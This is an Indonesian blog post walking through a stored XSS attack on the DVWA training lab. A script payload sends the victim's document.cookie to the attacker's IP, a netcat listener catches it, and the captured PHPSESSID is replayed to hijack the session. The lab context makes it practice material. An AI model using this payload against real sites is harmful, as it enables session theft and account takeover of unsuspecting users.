Tuesday 20 March 2018

IT : XSS Stored Stealing Cookie with DVWA (Low Security)

Hi, kali ini saya akan melakukan Session Hijacking dengan cara mencuri cookie pertama tama saya akan membuka halaman XSS Storednya


kemudian saya akan mencari tau ip saya



kemudian saya masukan script ini
<script>new Image().src="http://[ip address mu]/pizza.php?"+ document.cookie;</script>
Note : Pizza.php gak perlu ada

kemudian kita tekan sign guest book


kemudian saya akan log out

set listener dengan memasukan netcat -lvp (port)
Tips : anda juga bisa mengganti netcat menjadi nc


kemudian korban akan melogin

setelah itu korban membuka halaman yang terdapat script kita tadi





di listener kita akan terdapat seperti ini



saya menggunakan ekstensi cookie inspector di chrome kemudian menekan [CTRL]+[SHIFT]+[J]
click kanan pada cookie PHPSESSID


copy PHPSESSID kita di terminal

click kanan kemudian tekan edit, terus masukan value cookie kita

buka halaman nya lagi kemudian kita terlogin
Note: kalo gak login coba buka filenya yang didalam 



 sekian keep calm and keep using green font, cause hacker does that


EmoticonEmoticon

Note: only a member of this blog may post a comment.